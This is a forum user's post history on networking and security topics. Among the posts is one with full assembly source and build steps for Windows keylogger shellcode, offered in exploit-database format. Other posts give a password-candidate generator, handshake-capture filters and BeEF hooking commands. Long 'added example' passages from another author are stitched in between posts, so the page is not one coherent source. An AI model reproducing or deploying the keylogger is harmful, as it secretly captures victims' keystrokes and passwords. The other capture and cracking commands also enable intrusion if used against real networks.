fugu

Everything posted by fugu

  1. Consider using an ARP packet fingerprinting tool?

```
# apt-get install arp-scan
# arp-fingerprint 192.168.0.2
```

It is more limited because it's just using ARP packets, but as long as you're on the same subnet you should be able to read something. And no port information :(
  2. Whatever you end up doing, just don't be messing around with this thing when you're driving #distracteddriving
  3. I modified it a little bit, is this more like what you wanted to do?

```
$ cat pineap.log | cut -c34- | sort | uniq | cut -c20- | sort | uniq -c | sort -r -n
```
  4. I hope the formatting holds up

```nasm
; Exploit Title: All windows null free shellcode - primitive keylogger to file - 431 (0x01AF) bytes
; Date: Sat Apr 23 18:34:25 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the same directory as the exe, iff that DIR is writable.
; it is kinda spammy to the logfile, and will grow quickly. keystrokes are saved in format:
; "Virtual-Key Codes", from msdn.microsoft.com website
; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
; dd if=test.exe bs=1 status=none skip=$((0x200)) count=$((0x3AE-0x200+1)) | xxd -ps | tr -d '\n'; echo

section .bss
section .data
section .text
global _start
_start:
    cld                          ; 00000000 FC
    xor edx,edx                  ; 00000001 31D2
    mov dl,0x30                  ; 00000003 B230
    push dword [fs:edx]          ; 00000005 64FF32
    pop edx                      ; 00000008 5A
    mov edx,[edx+0xc]            ; 00000009 8B520C
    mov edx,[edx+0x14]           ; 0000000C 8B5214
loc_fh:
    mov esi,[edx+0x28]           ; 0000000F 8B7228
    xor eax,eax                  ; 00000012 31C0
    mov ecx,eax                  ; 00000014 89C1
    mov cl,0x3                   ; 00000016 B103
loc_18h:
    lodsb                        ; 00000018 AC
    rol eax,byte 0x8             ; 00000019 C1C008
    lodsb                        ; 0000001C AC
    loop loc_18h                 ; 0000001D E2F9
    lodsb                        ; 0000001F AC
    cmp eax,0x4b45524e           ; 00000020 3D4E52454B
    jz loc_2ch                   ; 00000025 7405
    cmp eax,0x6b65726e           ; 00000027 3D6E72656B
loc_2ch:
    mov ebx,[edx+0x10]           ; 0000002C 8B5A10
    mov edx,[edx]                ; 0000002F 8B12
    jnz loc_fh                   ; 00000031 75DC
    mov edx,[ebx+0x3c]           ; 00000033 8B533C
    add edx,ebx                  ; 00000036 01DA
    push dword [edx+0x34]        ; 00000038 FF7234
    mov edx,[edx+0x78]           ; 0000003B 8B5278
    add edx,ebx                  ; 0000003E 01DA
    mov esi,[edx+0x20]           ; 00000040 8B7220
    add esi,ebx                  ; 00000043 01DE
;GetProcAddress
    xor ecx,ecx                  ; 00000045 31C9
loc_47h:
    inc ecx                      ; 00000047 41
    lodsd                        ; 00000048 AD
    add eax,ebx                  ; 00000049 01D8
    cmp dword [eax],0x50746547   ; 0000004B 813847657450
    jnz loc_47h                  ; 00000051 75F4
    cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341
    jnz loc_47h                  ; 0000005A 75EB
    cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265
    jnz loc_47h                  ; 00000063 75E2
    dec ecx                      ; 00000065 49
    mov esi,[edx+0x24]           ; 00000066 8B7224
    add esi,ebx                  ; 00000069 01DE
    mov cx,[esi+ecx*2]           ; 0000006B 668B0C4E
    mov esi,[edx+0x1c]           ; 0000006F 8B721C
    add esi,ebx                  ; 00000072 01DE
    mov edx,[esi+ecx*4]          ; 00000074 8B148E
    add edx,ebx                  ; 00000077 01DA
    mov edi,edx                  ; 00000079 89D7
    push edx                     ; 0000007B 52
;GetModuleHandleA
    xor eax,eax                  ; 0000007C 31C0
    push eax                     ; 0000007E 50
    push dword 0x41656c64        ; 0000007F 68646C6541
    push dword 0x6e614865        ; 00000084 686548616E
    push dword 0x6c75646f        ; 00000089 686F64756C
    push dword 0x4d746547        ; 0000008E 684765744D
    push esp                     ; 00000093 54
    push ebx                     ; 00000094 53
    call edi                     ; 00000095 FFD7
    lea esp,[esp+0x14]           ; 00000097 8D642414
    push eax                     ; 0000009B 50
;GetModuleHandleA("USER32.DLL")
    push dword 0x88014c4c        ; 0000009C 684C4C0188
    dec byte [esp+0x2]           ; 000000A1 FE4C2402
    push dword 0x442e3233        ; 000000A5 6833322E44
    push dword 0x52455355        ; 000000AA 6855534552
    push esp                     ; 000000AF 54
    call eax                     ; 000000B0 FFD0
    xor edx,edx                  ; 000000B2 31D2
    cmp eax,edx                  ; 000000B4 39D0
    jnz loc_f0h                  ; 000000B6 7538
    lea esp,[esp+0xc]            ; 000000B8 8D64240C
;LoadLibraryA
    push edx                     ; 000000BC 52
    push dword 0x41797261        ; 000000BD 6861727941
    push dword 0x7262694c        ; 000000C2 684C696272
    push dword 0x64616f4c        ; 000000C7 684C6F6164
    push esp                     ; 000000CC 54
    push ebx                     ; 000000CD 53
    call edi                     ; 000000CE FFD7
    lea esp,[esp+0x10]           ; 000000D0 8D642410
    push eax                     ; 000000D4 50
;LoadLibraryA("USER32.DLL")
    push dword 0x77014c4c        ; 000000D5 684C4C0177
    dec byte [esp+0x2]           ; 000000DA FE4C2402
    push dword 0x442e3233        ; 000000DE 6833322E44
    push dword 0x52455355        ; 000000E3 6855534552
    push esp                     ; 000000E8 54
    call eax                     ; 000000E9 FFD0
    lea esp,[esp+0xc]            ; 000000EB 8D64240C
    push eax                     ; 000000EF 50
;GetKeyState
loc_f0h:
    mov edx,eax                  ; 000000F0 89C2
    push dword 0x1657461         ; 000000F2 6861746501
    dec byte [esp+0x3]           ; 000000F7 FE4C2403
    push dword 0x74537965        ; 000000FB 6865795374
    push dword 0x4b746547        ; 00000100 684765744B
    push esp                     ; 00000105 54
    push edx                     ; 00000106 52
    call edi                     ; 00000107 FFD7
    lea esp,[esp+0xc]            ; 00000109 8D64240C
    push eax                     ; 0000010D 50
;WriteFile
    push dword 0x55010165        ; 0000010E 6865010155
    dec byte [esp+0x1]           ; 00000113 FE4C2401
    push dword 0x6c694665        ; 00000117 686546696C
    push dword 0x74697257        ; 0000011C 6857726974
    push esp                     ; 00000121 54
    push ebx                     ; 00000122 53
    call edi                     ; 00000123 FFD7
    lea esp,[esp+0xc]            ; 00000125 8D64240C
    push eax                     ; 00000129 50
;CreateFileA
    push dword 0x141656c         ; 0000012A 686C654101
    dec byte [esp+0x3]           ; 0000012F FE4C2403
    push dword 0x69466574        ; 00000133 6874654669
    push dword 0x61657243        ; 00000138 6843726561
    push esp                     ; 0000013D 54
    push ebx                     ; 0000013E 53
    call edi                     ; 0000013F FFD7
    lea esp,[esp+0xc]            ; 00000141 8D64240C
    push eax                     ; 00000145 50
    push dword 0x16e6962         ; 00000146 6862696E01
    dec byte [esp+0x3]           ; 0000014B FE4C2403
    push dword 0x2e676f6c        ; 0000014F 686C6F672E
    xor ecx,ecx                  ; 00000154 31C9
    push ecx                     ; 00000156 51
    push ecx                     ; 00000157 51
    add byte [esp],0x80          ; 00000158 80042480
    push byte +0x4               ; 0000015C 6A04
    push ecx                     ; 0000015E 51
    push byte +0x2               ; 0000015F 6A02
    push ecx                     ; 00000161 51
    add byte [esp],0x4           ; 00000162 80042404
    lea ecx,[esp+0x18]           ; 00000166 8D4C2418
    push ecx                     ; 0000016A 51
    call eax                     ; 0000016B FFD0
    lea esp,[esp+0x8]            ; 0000016D 8D642408
    push eax                     ; 00000171 50
;main loop
loc_172h:
    xor ecx,ecx                  ; 00000172 31C9
    xor esi,esi                  ; 00000174 31F6
loc_176h:
    mov cl,0xff                  ; 00000176 B1FF
    mov eax,esi                  ; 00000178 89F0
    cmp al,cl                    ; 0000017A 38C8
    jc loc_180h                  ; 0000017C 7202
    xor esi,esi                  ; 0000017E 31F6
loc_180h:
    inc esi                      ; 00000180 46
    push esi                     ; 00000181 56
    call dword [esp+0x10]        ; 00000182 FF542410
    mov edx,esi                  ; 00000186 89F2
    xor ecx,ecx                  ; 00000188 31C9
    mov cl,0x80                  ; 0000018A B180
    and eax,ecx                  ; 0000018C 21C8
    xor ecx,ecx                  ; 0000018E 31C9
    cmp eax,ecx                  ; 00000190 39C8
    jz loc_176h                  ; 00000192 74E2
    push edx                     ; 00000194 52
    push ecx                     ; 00000195 51
    lea ecx,[esp]                ; 00000196 8D0C24
    push ecx                     ; 00000199 51
    push byte +0x1               ; 0000019A 6A01
    lea ecx,[esp+0xc]            ; 0000019C 8D4C240C
    push ecx                     ; 000001A0 51
    push dword [esp+0x14]        ; 000001A1 FF742414
    call dword [esp+0x20]        ; 000001A5 FF542420
    lea esp,[esp+0x4]            ; 000001A9 8D642404
    jmp short loc_172h           ; 000001AD EBC3
;the actual shellcode
```
  5. I'm not sure how to do that in python, but in bash you can do

```
$ cat pineap.log | cut -c34- | sort | uniq -c | sort -n -r | head -100
```

If you just want the SSIDs you can do

```
$ cat pineap.log | cut -c53- | sort | uniq -c | sort -n -r | head -100
```
  6. Yeah, there was supposed to be a space there, you are correct. I'm constantly plagued with formatting issues when I post here (and everywhere actually) because I try to do everything with JavaScript disabled. It makes surfing the web very interesting and fun.

Edit: I concur, you could probably get more info with a proxy of some sort. If you have access to a Firefox browser, there's an addon that I've used in the past called "Live HTTP Headers" that will be able to pick up all the header info, along with all the GET and POST variables for the requests to every resource on that site. I wouldn't run that addon for daily use because it might also reveal passwords and things you want to protect. But it will show you all the POST variables that will end up in the request. I'm guessing that the header you're looking for begins with "POST /xfinitywifi/signup HTTP/1.1"

PPS: I think you might have the wrong webpage, this looks like a signup webpage and not a signin webpage
  7. I wrote this a while ago. It works very similarly to crunch, but also allows you to break up the whole task into individual parts easily. So you can run it on multiple machines/devices/whatever at the same time. Just needs python.

```python
#!/usr/bin/env python3
import getopt
import sys

# defaults; all of them can be overridden on the command line
charset = ['A', 'B']
minpasswordlength = 2
maxpasswordlength = 4
cores = -1
startindex = -1
endindex = -1
master = False

options, remainder = getopt.getopt(sys.argv[1:], '',
    ['master', 'charset=', 'minp=', 'maxp=', 'cores=', 'startindex=', 'endindex='])
for opt, arg in options:
    if opt == '--charset':
        charset = list(arg)
    elif opt == '--minp':
        minpasswordlength = int(arg)
    elif opt == '--maxp':
        maxpasswordlength = int(arg)
    elif opt == '--cores':
        cores = int(arg)
    elif opt == '--startindex':
        startindex = int(arg)
    elif opt == '--endindex':
        endindex = int(arg)
    elif opt == '--master':
        master = True


def find_max_index(charset, minpasswordlength, maxpasswordlength):
    # total number of candidates over all lengths in the range
    maxindex = 0
    charsetlen = len(charset)
    for l in range(minpasswordlength, maxpasswordlength + 1):
        maxindex += pow(charsetlen, l)
    return maxindex


def index2password(index, charset, minpasswordlength, maxpasswordlength):
    # pick the length band the index falls in, then decode the offset inside that band
    subsum = 0
    charsetlen = len(charset)
    for l in range(minpasswordlength, maxpasswordlength + 1):
        passwordlength = l
        subsum += pow(charsetlen, l)
        if index < subsum:
            break
    subindex = (index - subsum) % pow(charsetlen, l)
    ary = []
    for i in range(0, passwordlength):
        ary.append(charset[(subindex // pow(charsetlen, i)) % charsetlen])
    return ''.join(list(reversed(ary)))


if master and cores > 0:
    # print one command per device, each covering an equal slice of the index space
    m = find_max_index(charset, minpasswordlength, maxpasswordlength)
    for i in range(0, cores):
        print("python " + sys.argv[0]
              + " --charset=\"" + "".join(charset) + "\""
              + " --minp=" + str(minpasswordlength)
              + " --maxp=" + str(maxpasswordlength)
              + " --startindex=" + str(int(i * (float(m) / float(cores))))
              + " --endindex=" + str(int((i + 1) * (float(m) / float(cores))) - 1))
elif startindex != -1 and endindex != -1:
    for index in range(startindex, endindex + 1):
        print(index2password(index, charset, minpasswordlength, maxpasswordlength))
else:
    print("Usage: python " + sys.argv[0] + " --master --charset=\"ABC\" --minp=2 --maxp=4 --cores=3")
    print("\tmaster = create the various commands to split amongst the various devices")
    print("\tcharset = the characters you have in the password")
    print("\tminp = minimum number of characters in the password")
    print("\tmaxp = maximum number of characters in the password")
    print("\tcores = number of devices you want to split this task up into")
```
  8. In one terminal I run:

```
$ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080
```

And in a 2nd terminal I run:

```
$ curl --user-agent "secure_user_agent" -c "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" http://localhost:8080/
```

...

```
$ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080
GET / HTTP/1.1
Host: localhost:8080
User-Agent: secure_user_agent
Accept: */*
```

As you can see, the COOKIE is not being displayed. But if I use:

```
$ curl --user-agent "secure_user_agent" -b "PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2" http://localhost:8080/
```

...

```
$ echo -ne "HTTP/1.1 200 OK\r\n\r\n<html><h1>Hi</h1></html>" | nc -l 8080
GET / HTTP/1.1
Host: localhost:8080
User-Agent: secure_user_agent
Accept: */*
Cookie: PHPSESSID=8pp2qs7kjmjtq7b8423g3o8jj2
```

Now the cookie is showing up. I'm ASSUMING that it's a cookie problem.

Edit: fixed symbols
  9. DARPA to geeks: Weaponize your toasters for America! http://www.theregister.co.uk/2016/03/12/darpa_weaponize_your_toaster/ ...DARPA is asking researchers, hobbyists and industry vendors to hack away at embedded devices and consumer technology in hopes of finding possible avenues of attack... The agency is holding a special webinar for interested applicants on March 29 and 30. I think this looks really neat!
  10. In the past I've used tcpdump to capture wireless packets, but you have to manually put the card in monitor mode.

```
wlan[0x00] == 0x80     is a Beacon Frame
wlan[0x00] == 0x08     is a Data Frame
wlan[0x1e:2] == 0x888e is 802.1X Authentication
wlan[0x24] == 0x02     is EAPOL
```

```
sudo tcpdump -i wlan0 -w dumpfile.pcap -s 0 -n \( wlan[0x00] == 0x80 \) or \( wlan[0x00] == 0x08 and wlan[0x1e:2] == 0x888e and wlan[0x24] == 0x02 \)
```

I haven't thoroughly tested the above command for capping the EAPOL part, but I do get a ton of beacon frames. It probably needs a bit of tweaking to get it to cap correctly. (Edit: fixed a typo)
  11. I think the neatest tool for injection is BeEF (which is on the Kali distro):

```
cd /usr/share/beef-xss/
./beef
```

It has a small bit of JavaScript that sort of automatically refreshes the browser (hook), and allows you to inject your JavaScript/HTML on demand. At the very least, it might give you some ideas around how to correct your current problem.
  12. Been wondering this for a while now, didn't get much info from Google, maybe someone here knows. Are wifi beacon frames and probe requests broadcast to all 14 channels in wifi? It seems like they should be, if the adapter doesn't know what channel to set itself to when it's not associated yet. Thank you in advance.
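The tcpdump filter above is written in terms of raw byte offsets into the 802.11 frame. The following added example (not part of the original post) reimplements the same byte tests in Python over constructed frames, so the offsets can be checked without a wireless card: in a plain (non-QoS) data frame the 24-byte header is followed by the 8-byte LLC/SNAP header, so the EtherType sits at byte 0x1e, and the first byte after the 4-byte EAPOL header (the key descriptor type in an EAPOL-Key frame) sits at byte 0x24. QoS data frames (first byte 0x88) carry a 26-byte header, so the same offsets no longer line up, which the example shows as a failure mode. All frames and helper names here are constructed for the demonstration.

```python
# Added example: Python equivalent of the tcpdump byte-offset filter, over constructed frames.
import struct

# Offsets used by the tcpdump filter (802.11 header bytes; radiotap header already stripped)
FC_BYTE = 0x00         # first frame-control byte: type/subtype
ETHERTYPE_OFF = 0x1e   # 24-byte data header + 6 bytes of LLC/SNAP -> 2-byte EtherType
EAPOL_BODY_OFF = 0x24  # 24 + 8 (LLC/SNAP) + 4 (EAPOL version/type/length) -> key descriptor type


def classify_frame(frame: bytes) -> str:
    """Return 'beacon', 'eapol-key' or 'other' using the same tests as the BPF filter."""
    if len(frame) < 1:
        return 'other'
    if frame[FC_BYTE] == 0x80:
        return 'beacon'
    if (frame[FC_BYTE] == 0x08 and len(frame) > EAPOL_BODY_OFF
            and struct.unpack_from('>H', frame, ETHERTYPE_OFF)[0] == 0x888e
            and frame[EAPOL_BODY_OFF] == 0x02):
        return 'eapol-key'
    return 'other'


def classify_all(frames) -> list:
    """Classify a capture (list of raw 802.11 frames) frame by frame."""
    return [classify_frame(f) for f in frames]


def build_beacon() -> bytes:
    # constructed beacon: FC 0x0080 (bytes 80 00), duration, DA/SA/BSSID, sequence control
    hdr = (bytes([0x80, 0x00]) + b'\x00\x00'
           + b'\xff' * 6 + b'\x02' * 6 + b'\x02' * 6 + b'\x00\x00')
    return hdr + b'\x00' * 12  # timestamp / beacon interval / capabilities placeholder


def build_eapol_key(qos: bool = False) -> bytes:
    # constructed data frame carrying an EAPOL-Key message with RSN key descriptor type 2
    fc = bytes([0x88, 0x00]) if qos else bytes([0x08, 0x00])
    hdr = fc + b'\x00\x00' + b'\x01' * 6 + b'\x02' * 6 + b'\x03' * 6 + b'\x00\x00'
    if qos:
        hdr += b'\x00\x00'  # QoS control field: everything after it shifts by two bytes
    llc_snap = b'\xaa\xaa\x03\x00\x00\x00' + struct.pack('>H', 0x888e)
    # EAPOL: version 2, packet type 3 (EAPOL-Key), body length, then descriptor type 2
    eapol = b'\x02\x03' + struct.pack('>H', 95) + b'\x02'
    return hdr + llc_snap + eapol + b'\x00' * 94


if __name__ == '__main__':
    capture = [build_beacon(), build_eapol_key(), build_eapol_key(qos=True)]
    for frame, label in zip(capture, classify_all(capture)):
        print(f'{frame[0]:#04x} -> {label}')
```

The QoS case comes out as `other` even though it carries an EAPOL-Key frame, which is the kind of tweaking the post refers to: a filter that also wants QoS data frames has to test for the 0x88 type/subtype byte and add two to the later offsets.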
  13. also available from amazon http://www.amazon.com/FAVI-FE01-BL-Wireless-Keyboard-Touchpad/dp/B003UE52ME/
  14. This reminds me a lot of the bf programming language:

```
sudo apt-get install bf
```

"bf ('a Brainfuck interpreter') is a simple and fast interpreter for the esoteric programming language Brainfuck. It offers some options to define special behavior, which is nice if you take part in Brainfuck programming contests with special rules."
  15. With whole disk encryption there is a small part of the drive that's unencrypted, which is needed to boot the computer. I wrote this script to keep tabs on those important files and look for changes. It hashes new boot files and stores a copy of them within the script itself in an sqlite database, and also looks for changes in those files over time. The file can get to be 100M+ if you have a lot of boot files, so be forewarned.

```bash
#!/bin/bash
# Find the line number of the separator; everything after it is the base64 sqlite database
EOS=2
while [ 1 ]; do
    if [ -n "$(cat $0 | head -n $EOS | tail -n 1 | grep '^###########################################################$')" ]; then
        break
    fi
    EOS=$(($EOS+1))
done

# Unpack the embedded database and the script body into temp files
SQLITEDB=$(tempfile)
SCRIPTFILE=$(tempfile)
trap "rm -f $SQLITEDB $SCRIPTFILE" EXIT
tail -n +$(($EOS+1)) $0 | base64 -d > $SQLITEDB
head -n $EOS $0 > $SCRIPTFILE

if [ -z "$1" ]; then
    echo $EOS
    sqlite3 $SQLITEDB "CREATE TABLE IF NOT EXISTS hashes(id INTEGER PRIMARY KEY, filename TEXT UNIQUE NOT NULL, md5 TEXT, sha1 TEXT, sha256 TEXT);"
    sqlite3 $SQLITEDB "CREATE TABLE IF NOT EXISTS contents(id INTEGER, subindex INTEGER, data TEXT);"
    for i in /boot/initrd.img-*-generic; do
        if [ -n "$(echo "$i" | grep '/boot/initrd\.img-[0-9]\+\.[0-9]\+\.[0-9]\+-[0-9]\+-generic')" ]; then
            filename_already_exists="$(sqlite3 $SQLITEDB "SELECT count(filename) FROM hashes WHERE filename = '$i';")"
            if [ "$filename_already_exists" = "0" ]; then
                #NEW
                echo -e "\e[34;1mNEW FILE $i\e[0m"
                MD5=$(md5sum "$i" | cut -d' ' -f1)
                SHA1=$(sha1sum "$i" | cut -d' ' -f1)
                SHA256=$(sha256sum "$i" | cut -d' ' -f1)
                sqlite3 $SQLITEDB 'INSERT INTO hashes (filename, md5, sha1, sha256) VALUES ("'"$i"'", "'"$MD5"'", "'"$SHA1"'", "'"$SHA256"'");'
                echo -e "\e[34;1madded hashes...\e[0m"
                id=$(sqlite3 $SQLITEDB 'SELECT id FROM hashes WHERE filename="'$i'";')
                echo "id=$id"
                # gzip + base64 the file, then split it into rows of 32768 characters
                DATA="$(cat "$i" | gzip -9 | base64 | tr -d '\n' | sed 's/\(.\{16384\}.\{16384\}\)/\1\n/g')"
                echo -e "\e[34;1mbinary data formatted, adding to sqlite db...\e[0m"
                count=0
                for singlerow in $DATA; do
                    sqlite3 $SQLITEDB 'insert into contents (id, subindex, data) VALUES ("'$id'", "'$count'", "'$singlerow'");'
                    count=$(($count+1))
                done
                echo -e "\e[34;1m[+] $i HAS BEEN ADDED TO THE DATABASE\e[0m"
            elif [ "$filename_already_exists" = "1" ]; then
                #EXISTS
                MD5=$(md5sum "$i" | cut -d' ' -f1)
                SHA1=$(sha1sum "$i" | cut -d' ' -f1)
                SHA256=$(sha256sum "$i" | cut -d' ' -f1)
                verify="$(sqlite3 $SQLITEDB "SELECT count(filename) FROM hashes WHERE filename = '$i' AND md5 = '$MD5' AND sha1 = '$SHA1' AND sha256 = '$SHA256';")"
                if [ "$verify" = "1" ]; then
                    echo -e "\e[32;1m$i HAS NOT CHANGED\e[0m"
                elif [ "$verify" = "0" ]; then
                    echo -e "\e[31;1m$i HAS CHANGED\e[0m"
                else
                    echo "ERROR PROCESSING $i" 1>&2
                    exit 1
                fi
            else
                echo "Error: database did not query correctly" 1>&2
                exit 1
            fi
        fi
    done
else
    # any argument is run as a raw query against the embedded database
    sqlite3 $SQLITEDB "$1"
fi

# Rewrite this script with the updated database appended after the separator
cat $SCRIPTFILE > $0
cat $SQLITEDB | base64 >> $0
exit 0
###########################################################
```
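The idea behind the script above (hash the files in the unencrypted boot partition, keep the hashes in SQLite, and report NEW / UNCHANGED / CHANGED on later runs) is worth having in a form that does not rewrite itself. The following is an added example written for this page, not the poster's script: it keeps only SHA-256 digests, streams large initrd images instead of reading them into memory, and runs its demo against constructed temporary files rather than the real `/boot`. The function names and the `demo()` layout are assumptions of this example.

```python
# Added example: SQLite-backed integrity baseline for boot files (not the script from the post).
import hashlib
import os
import sqlite3
import tempfile
from typing import Dict, Iterable


def sha256_of(path: str) -> str:
    """Stream the file through SHA-256 so a large initrd does not have to fit in RAM."""
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(1 << 20), b''):
            h.update(chunk)
    return h.hexdigest()


def check_files(paths: Iterable[str], db_path: str) -> Dict[str, str]:
    """Compare each path with its stored digest; a first sighting is recorded as NEW.

    Returns a mapping path -> 'NEW' | 'UNCHANGED' | 'CHANGED'. A CHANGED file keeps
    its old baseline on purpose: re-baselining is a human decision, not an automatic one.
    """
    results: Dict[str, str] = {}
    con = sqlite3.connect(db_path)
    try:
        con.execute('CREATE TABLE IF NOT EXISTS hashes('
                    'filename TEXT PRIMARY KEY, sha256 TEXT NOT NULL)')
        for path in paths:
            digest = sha256_of(path)
            row = con.execute('SELECT sha256 FROM hashes WHERE filename = ?',
                              (path,)).fetchone()
            if row is None:
                con.execute('INSERT INTO hashes (filename, sha256) VALUES (?, ?)',
                            (path, digest))
                results[path] = 'NEW'
            elif row[0] == digest:
                results[path] = 'UNCHANGED'
            else:
                results[path] = 'CHANGED'
        con.commit()
    finally:
        con.close()
    return results


def demo() -> Dict[str, str]:
    """Constructed demo: two fake boot files, checked twice, with one modified in between."""
    with tempfile.TemporaryDirectory() as d:
        kernel = os.path.join(d, 'vmlinuz-demo')
        initrd = os.path.join(d, 'initrd.img-demo')
        with open(kernel, 'wb') as f:
            f.write(b'constructed kernel image bytes')
        with open(initrd, 'wb') as f:
            f.write(b'constructed initrd image bytes')
        db = os.path.join(d, 'boot-hashes.sqlite')
        first = check_files([kernel, initrd], db)
        with open(initrd, 'ab') as f:
            f.write(b'!')  # simulate a tampered initrd
        second = check_files([kernel, initrd], db)
        return {
            'kernel_first': first[kernel],
            'initrd_first': first[initrd],
            'kernel_second': second[kernel],
            'initrd_second': second[initrd],
        }


if __name__ == '__main__':
    for name, status in demo().items():
        print(f'{name}: {status}')
```

For real use, call something like `check_files(glob.glob('/boot/initrd.img-*'), db_path)` from a root cron job, and keep the database somewhere the same tampering could not also reach (inside the encrypted volume or on removable media): a baseline stored next to the unencrypted files can be rewritten together with them, which is the same weakness the self-rewriting script has when it lives on an unencrypted partition.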
  16. Does this work?

```
w3m https://cable.nnu.com/cablewifi/?client-mac=$(cat /sys/class/net/wlan0/address)
```
  17. I have a problem with this statement. Because you can't permanently update a livecd, when a problem becomes known with some software that's running on the livecd, it's vulnerable, and a keylogger can be installed on the current running instance of the OS. Of course when you restart it, the keylogger will be gone, but being still vulnerable, the keylogger can be placed back onto the new running instance of the OS. In some ways, you might be more vulnerable using a livecd. Just my 2 cents :)
  18. I would also like to add that an exploit that is not able to execute remote code, but is able to crash the remote service can be called a Denial of Service Exploit. I don't think an exploit could ever be called a DDOS exploit.
  19. I came across this neat piece of software that I thought I'd share, it really works pretty well too. tcpflow is in the repos (apt-get install tcpflow). It's used to parse through those giant pcap files and extract out images and HTML and JS and just about everything that's not encrypted. I've found it very useful to see where my websites are misbehaving and it made it faster to correct them. One thing to note, I've found it seems to not like the newer pcapng format so much and prefers the older pcap format.
  20. Just a theoretical idea, but if your monitoring software is vulnerable, it can still be attacked, just from listening on a network. Back in December 2014, there were 4 vulnerabilities discovered for "tcpdump" which up until that time I thought was rock solid software. But these vulnerabilities allowed for the possibility of remote execution of code and it would be possible to have malformed packets travelling over the wire and blindly exploit the hidden monitor. Granted I agree the chance for this is probably low, but I think it's still a possibility. Libpcap is a pretty big piece of software!
  21. What I meant to say was, I thought the LAN Star physically separated the read/write cables so that even if the raspi was exploited, it physically couldn't write out over the line. Kinda like this article, but for traffic in both directions: http://www.linuxjournal.com/article/6985 . In monitor mode, if the pi was exploited it could have its mode changed and start writing back out onto the network. I've also heard (but many years ago, and it is probably not the case any more) that sometimes ARP packets would be leaked corresponding to the MAC address of the adapter, even in monitor mode.
  22. Isn't the LAN Star a read-only device? Meaning that it prohibits traffic leaving the tap device? If you're going to roll your own, make sure it's not able to transmit anything.
  23. You have 4 MAC addresses that your router is talking to; find out if/which one doesn't belong:

```
00:1C:25:DC:41:67  Hon Hai Precision Ind. Co.,Ltd.
28:E3:47:29:65:8D  Liteon Technology Corporation
C0:9F:42:D0:16:9A  Apple, Inc.
E4:12:1D:53:73:3B  Samsung Electronics Co.,Ltd
```
  24. http://www.usatoday.com/story/tech/2014/04/22/mind-reading-brain-scans/7747831/